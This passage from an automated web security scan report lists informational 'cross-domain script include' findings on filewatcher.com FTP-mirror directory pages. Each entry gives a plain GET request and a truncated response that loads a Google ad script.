Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:23 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ACDuSH5AM95QvmJOs04SdQ"
Content-Length: 5794
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:23 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 702
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-koeln.de/mirrors/redhat.
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.952. http://www.filewatcher.com/b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:24 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "n7L5bkn3UV97j0Xx/Zi6tg"
Content-Length: 5599
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:24 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 707
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-koeln.de/mirrors/redhat.
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.953. http://www.filewatcher.com/b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:24 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "P8Sjj54gHVrug3r3GUMWTA"
Content-Length: 5878
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:24 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 708
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-koeln.de/mirrors/redhat.
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.954. http://www.filewatcher.com/b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:24 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "tCv6kuP0WeKNjutPbBLvMQ"
Content-Length: 8120
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:24 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 712
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-koeln.de/mirrors/redhat.
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.955. http://www.filewatcher.com/b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1/en.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1/en.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1/en.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:25 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "+K90YVCs73jbcQkU25eruA"
Content-Length: 7246
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:25 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 712
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-koeln.de/mirrors/redhat.
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.956. http://www.filewatcher.com/b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1/en/powertools.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1/en/powertools.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1/en/powertools.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:25 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "WpNCciUgGzegd3ji99CUwA"
Content-Length: 6359
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:25 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 713
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-koeln.de/mirrors/redhat.
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.957. http://www.filewatcher.com/b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1/en/powertools/alpha.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1/en/powertools/alpha.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1/en/powertools/alpha.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:25 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "uCGZpM58zmFar9cZKWQ1Bw"
Content-Length: 7839
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:25 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 714
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-koeln.de/mirrors/redhat.
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.958. http://www.filewatcher.com/b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1/en/powertools/alpha/RedHat.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1/en/powertools/alpha/RedHat.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1/en/powertools/alpha/RedHat.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:26 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "C7P/kA+shyMApW9Aoag99g"
Content-Length: 6308
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:26 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 717
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-koeln.de/mirrors/redhat.
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.959. http://www.filewatcher.com/b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1/en/powertools/alpha/RedHat/RPMS.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1/en/powertools/alpha/RedHat/RPMS.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1/en/powertools/alpha/RedHat/RPMS.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:26 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "XVV02YRDLc1pBNwOc7+7wA"
Content-Length: 42054
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:26 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 721
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-koeln.de/mirrors/redhat.
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.960. http://www.filewatcher.com/b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1/en/powertools/alpha/SRPMS.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1/en/powertools/alpha/SRPMS.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1/en/powertools/alpha/SRPMS.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:27 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "zeEfJNlJYjPsQTKc+zFIag"
Content-Length: 50034
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:27 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 722
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-koeln.de/mirrors/redhat.
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.961. http://www.filewatcher.com/b/ftp/ftp.uni-koeln.de/packages.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-koeln.de/packages.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-koeln.de/packages.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:20 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "8yB2lyJHdyp+pGidpYw00Q"
Content-Length: 5738
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:20 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 691
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-koeln.de/packages/ - FTP
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.962. http://www.filewatcher.com/b/ftp/ftp.uni-koeln.de/packages/FreeBSD.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-koeln.de/packages/FreeBSD.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-koeln.de/packages/FreeBSD.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:20 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "aaGPCe0Hf3zTPk2Tqh9NCw"
Content-Length: 8316
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:20 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 693
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-koeln.de/packages/FreeBS
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.963. http://www.filewatcher.com/b/ftp/ftp.uni-koeln.de/packages/FreeBSD/ports.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-koeln.de/packages/FreeBSD/ports.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-koeln.de/packages/FreeBSD/ports.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:20 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "JEfMtOzbH/z73MmA5P597Q"
Content-Length: 5350
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:20 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 693
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-koeln.de/packages/FreeBS
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.964. http://www.filewatcher.com/b/ftp/ftp.uni-koeln.de/packages/FreeBSD/ports/i386.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-koeln.de/packages/FreeBSD/ports/i386.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-koeln.de/packages/FreeBSD/ports/i386.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:21 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "wLou2Zn26WwDoxiTfdkDJg"
Content-Length: 5540
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:21 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 694
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-koeln.de/packages/FreeBS
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.965. http://www.filewatcher.com/b/ftp/ftp.uni-koeln.de/packages/FreeBSD/ports/i386/packages-4.2-release.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-koeln.de/packages/FreeBSD/ports/i386/packages-4.2-release.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-koeln.de/packages/FreeBSD/ports/i386/packages-4.2-release.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:21 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "cF/4gxUGVKsGrUeZZHTpUA"
Content-Length: 25784
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:21 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 695
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-koeln.de/packages/FreeBS
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.966. http://www.filewatcher.com/b/ftp/ftp.uni-koeln.de/packages/FreeBSD/ports/i386/packages-4.2-release/Latest.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-koeln.de/packages/FreeBSD/ports/i386/packages-4.2-release/Latest.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-koeln.de/packages/FreeBSD/ports/i386/packages-4.2-release/Latest.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:22 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "n+Y5QtQeCdkFslaHODbxcw"
Content-Length: 19334
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:22 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 699
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-koeln.de/packages/FreeBS
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.967. http://www.filewatcher.com/b/ftp/ftp.uni-koeln.de/packages/FreeBSD/ports/i386/packages-4.2-release/news.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-koeln.de/packages/FreeBSD/ports/i386/packages-4.2-release/news.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-koeln.de/packages/FreeBSD/ports/i386/packages-4.2-release/news.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:22 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "0lELiKYMqm4ihDYxtpKWuQ"
Content-Length: 19090
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:22 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 699
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-koeln.de/packages/FreeBS
...[SNIP]...
</script>
<script type="text/javascript"
